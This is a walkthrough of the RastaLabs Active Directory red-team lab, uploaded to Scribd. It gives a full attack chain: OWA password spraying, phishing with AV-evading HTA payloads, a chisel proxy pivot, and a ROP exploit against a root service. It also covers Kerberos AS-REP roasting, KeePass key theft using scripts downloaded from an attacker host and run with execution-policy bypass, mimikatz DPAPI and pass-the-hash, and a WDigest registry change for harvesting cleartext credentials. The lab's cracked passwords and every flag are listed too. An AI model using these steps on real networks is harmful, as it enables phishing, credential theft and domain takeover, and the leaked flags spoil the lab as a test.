Scribd
Upload
2K views

rasta

Uploaded by

mipiso9067
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
2K views

rasta

Uploaded by

mipiso9067
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 5

# 10.10.110.

254 OWA

Google rastalabs linkedin and find Amber Hope


Use Mail Sniper to validate ahope is a valid username on rastalabs.local
Use Mail Sniper to spray passwords and discover her password is Summer2020
Flag is on tasks tab after logging in to OWA

# Infrastructure Note

Your payloads must bypass windows defender from may 4 2020


You can use https://github.com/felamos/weirdhta or
https://rastamouse.me/2019/08/covenant-donut-tikitorch/
You don't need tiki, standard shellcode loaders work fine with donut.
https://uknowsec.cn/posts/notes/shellcode%E5%8A%A0%E8%BD%BD%E6%80%BB%E7%BB%93.html
Chisel is a great tool to establish a reverse socks proxy pivot
https://github.com/jpillora/chisel
Build a local vm and test your payloads before wasting time in the lab.

# 10.10.123.101 WS04 (bowen)

Email bowen a hyperlink to your av bypassing hta file.


Wait 5 min for the autoit bot (phisherman) to click on it.
Flag is in M:\Desktop
Flag is in \\fs01\finance\flag.txt
key.txt is in M:\Desktop\$RECYCLE.BIN\

# 10.10.123.108 WS06 (tquinn)

Email tquinn a hyperlink to your av bypassing hta file use a Subject and Message
like "HR Policy Document"
Wait 5 min for the autoit bot to click on it.
Flag is in M:\Desktop\flag.txt.txt

# 10.10.122.20 (nix01)

From ws04
net use I: \\10.10.120.5\home$\ahope /user:ahope "Summer2020"
type I:\Desktop\nix01.ppk
net use I: /delete
puttygen nix01.ppk -O private-openssh -o nix
Setup a proxy pivot on ws04 with chisel
proxychains scp -i nix [email protected]:/usr/bin/paycalc .
proxychains ssh -i nix -L1234:127.0.0.1:1234 [email protected]
netcat 127.0.0.1 1234 is running paycalc as root
Use pwntools to create a ropchain that calls mprotect and executes shellcode placed
in an overtime note
see shell.py

# 10.10.123.102 (ws05)
From ws04 run rubeus asreproast in covenant to get a hash to ngodfrey
Crack the hash with kwprocessor to zaq123$%^&*()_+ using:
./kwp -z basechars/full.base keymaps/en-us.keymap routes/2-to-16-max-3-direction-
changes.route > kwp3.txt
john hash.txt --wordlist=kwp3.txt

Mount ngodfreys share:


net use I: \\10.10.120.5\home$\ngodfrey /user:ngodfrey "zaq123$%^&*()_+"
type I:\Desktop\flag.txt
net use I: /delete
Download Passwords.kdbx and Passwords-Key.key

Login to OWA as ngodfrey to find a pcap from rweston, use network miner to extract
the secret file
Rename the file secret.AES
There's a key.txt in bowens recycling bin on ws04
bowen has a protect-string module imported
Use FileCryptography.psm1 on ws04 running as bowen to decrypt the flag
https://gallery.technet.microsoft.com/scriptcenter/EncryptDecrypt-files-use-
65e7ae5d
$key = Get-Content key.txt | ConvertTo-SecureString -Force
Unprotect-File '.\secret.AES' -Algorithm AES -Key $key

# 10.10.123.102
proxychains evil-winrm -i 10.10.123.102 -u ngodfrey

Every 1-30 min the keepass database is unlocked, steal the credential from memory.
while ($true)
{
If((Get-Process -Name KeePass -ErrorAction SilentlyContinue ))
{
import-module ./k.ps1
Get-KeePassDatabaseKey -Verbose
Get-Process KeePass | Get-KeePassDatabaseKey -Verbose
Start-Sleep -Seconds 1000
}
Else
{
Start-Sleep -Seconds 5
}
}

iwr -uri http://10.10.14.2/KeeThief.ps1 -outfile k.ps1


iwr -uri http://10.10.14.2/grab.ps1 -outfile grab.ps1
powershell -executionpolicy bypass -File .\grab.ps1

Password is 1234567890qwertyuiopasdfghjklzxcvbnm!"(UKPOUND SIGN)$%^&*() use that


with the database and key to get:

ngodfrey_adm:J5KCwKruINyCJBKd1dZU
Inside the keepass database is a Recycling Bin folder with a flag.

ngodfrey_adm has LAPS admin password access to ws01-ws06

You can dump those passwords using powerview:


powershellimport (upload powerview.ps1)
powershell $pass = ConvertTo-SecureString 'J5KCwKruINyCJBKd1dZU' -AsPlainText -
Force; $cred = New-Object System.Management.Automation.PSCredential('rlab\
ngodfrey_adm', $pass); Get-ADObject -Name ws01 -Credential $cred | select ms-mcs-
admpwd; Get-ADObject -Name ws02 -Credential $cred | select ms-mcs-admpwd; Get-
ADObject -Name ws03 -Credential $cred | select ms-mcs-admpwd; Get-ADObject -Name
ws04 -Credential $cred | select ms-mcs-admpwd; Get-ADObject -Name ws05 -Credential
$cred | select ms-mcs-admpwd; Get-ADObject -Name ws06 -Credential $cred | select
ms-mcs-admpwd

proxychains evil-winrm -i 10.10.123.101 -u administrator


type C:\Users\Administrator\Desktop\flag.txt
proxychains evil-winrm -i 10.10.123.102 -u administrator
type C:\users\administrator\Desktop\flag.txt
# 10.10.121.108 Slacking Off (ws06)
tquinn on ws06 is running slack
proxychains evil-winrm -i 10.10.121.108 -u administrator
Inside the app data folder search for RASTA{
You'll find the flag in C:\users\tquinn\appdata\Roaming\Slack\IndexedDB\
https_app.slack.com_0.indexeddb.leveldb\000003.log

# 10.10.121.107 WS02 (epugh)


proxychains evil-winrm -i 10.10.121.107 -u administrator
type C:\users\administrator\Desktop\flag.txt

download and run covenant


safetykatz -> flag user has a key as its password
epugh's hash on hashes.com cracks to Sarah2017 (it's also in lsa secrets)

# 10.10.120.20 web01
proxychains ssh -L1234:127.0.0.1:80 [email protected]
sudo su to get root, nothing else on the box
basic markdown website with the linked in users

# 10.10.120.15 srv01
proxychains xfreerdp /v:10.10.120.15 /u:epugh /p:Sarah2017
user is an admin, copy a binary to C:\windows\tasks and run to bypass applocker
From rdp take ownership of C:\users\administrator\Desktop\flag.txt and give
yourself read access

# Multiple
Use mimikatz to get cleartext creds from lsa secrets
ws02:epugh:Sarah2017
ws03:ahope:Summer2020
ws04:bowen:NovakDjokovic001
ws05:ngodfrey:zaq123$%^&*()_+
ws06:tquinn:Telford1

Dump epugh_adms password from the vault on ws02:


getsystem
mimikatz sekurlsa::dpapi
Mimikatz answer "sekurlsa::pth /user:epugh /domain:rastalabs.local
/ntlm:326457b72c3f136d80d99bdbb935d109"
impersonateprocess (process we spawned above)
mimikatz answer "dpapi::masterkey /in:C:\Users\epugh\AppData\Roaming\Microsoft\
Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\7dc6a492-36e2-4c2d-be66-
ba29d263dda2"
mimikatz answer "dpapi::masterkey /in:C:\Users\epugh\AppData\Roaming\Microsoft\
Protect\S-1-5-21-1396373213-2872852198-2033860859-1151\7dc6a492-36e2-4c2d-be66-
ba29d263dda2 /rpc"
getsystem
mimikatz answer "dpapi::cred /in:C:\users\epugh\AppData\Local\Microsoft\
Credentials\936A68B5AC87C545C4A22D1AF264C8E9
/masterkey:dcd70638e50e3bcec7cd7fb888399748fea41f9bb137a72a13c98e30ee64469e27a03083
256e51f04051a427da9b8c34520fad6c8a486c3f6043ea959026670c"
epugh_adm:IReallyH8LongPasswords\!

The old path to get to DC01 from finding an editable GPO on fs01 with epugh_adm
then creating a golden ticket as rweston_da is no more.

Enable wdigest to log cleartext creds on all the boxes you have admin over.
shellcmd reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v
UseLogonCredential /t REG_DWORD /d 1
Wait for someone to login using rweston_da's cred and use mimikatz to dump:
W0lv3rh@mpt0n!!

# 10.10.120.1 (DC01)
Login using rweston_da with smbexec
Setup a reverse proxy pivot
Login with rdp
Edit the domain group policy to enable RDP everywhere and open the firewall port.
Flag on desktop
Flag in event logs:
Get-EventLog -LogName "Application" | where {$_.Message -like '*RASTA*'} | select
Message | format-table -wrap

# 10.10.122.15 (sql01)
Login using rweston_da with evil-winrm
Setup a reverse proxy pivot
Login with epugh_adm via rdp
Flag on desktop
Open MS Sql Management Studio, Flag in umbraco database flag table

# 10.10.122.5 (fs01)
Login using rweston_da with evil-winrm
Setup a reverse proxy pivot
Login with RDP
Flag is on administrator desktop, take ownership and add view rights

# 10.10.120.10 (mx01)
Login with rweston_da
no flags

# 10.10.121.106 (ws01 rweston)


Login using rweston_da with evil-winrm
In the startup folder you'll find a script that logs into http://10.10.122.254
copying contents from the clipboard
Monitor the clipboard to get the password to get rweston:BullyBully
Login to get the flag in the description field
rweston also has a decryptable credential with rweston_da's cleartext password

# Flags
RASTA{ph15h1n6_15_h4rdc0r3}
RASTA{w007_f007h0ld_l375_pwn}
RASTA{ju1cy_1nf0_1n_0p3n_5h4r35}
RASTA{br4v3_n3w_w0rld}
RASTA{k3rb3r05_15_7r1cky}
RASTA{50m371m35_y0u_mu57_b4ck7r4ck}
RASTA{3v3ryb0dy_l0v35_l4p5}
RASTA{53rv1c3_4bu53_f7w}
RASTA{wh3r3_w45_2f4_!?}
RASTA{n07h1n6_15_54f3}
RASTA{4ppl0ck32_5uck5}
RASTA{c00k1n6_w17h_645_n0w}
RASTA{d474b4535_4r3_u5u4lly_1n73r3571n6}
RASTA{6p0_4bu53_15_h4rdc0r3}
RASTA{r4574l4b5_ch4mp10n}
RASTA{1nc1d3n7_r35p0nd3r5_l0v3_l065}
RASTA{y0ur3_4_b4ll3r_70_637_7h15}
RASTA{cryp70_3xf1l7r4710n}
RASTA{c4r3ful_h0w_y0u_h4ndl3_cr3d5}
RASTA{937_84ck_70_w02k}

You might also like